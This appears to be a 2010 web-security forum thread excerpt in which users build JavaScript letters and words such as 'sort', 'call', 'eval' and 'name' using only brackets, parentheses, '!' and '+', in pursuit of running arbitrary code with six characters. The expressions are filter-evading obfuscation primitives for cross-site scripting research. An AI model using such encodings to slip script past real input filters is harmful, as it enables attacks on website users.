s: (![]+[])[!+[]+!+[]+!+[]]
o: (!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]
r: (!+[]+[])[+!+[]]
t: (!+[]+[])[+[]]

c: ([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]
a: (![]+[])[+!+[]]
l: (![]+[])[!+[]+!+[]]

e: (!+[]+[])[!+[]+!+[]+!+[]]
v: (+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[!+[]+!+[]+!+[]+[+[]]]
a: (![]+[])[+!+[]]
l: (![]+[])[!+[]+!+[]]

n: ([][[]]+[])[+!+[]]
a: (![]+[])[+!+[]]
m: ((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!+[]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]
e: (!+[]+[])[!+[]+!+[]+!+[]]

----------------------
~Veritas~

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: Gareth Heyes
Date: July 14, 2010 05:48AM

@LeverOne

Noooooooooooooooooooooooooooo we can do it somehow!!!!!!!!!!!!!!!!!!!!!!!!!!!

We just need a "p" && "_" :(

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Pages: Previous123Next
Current Page: 2 of 3


Sorry, only registered users may post in this forum.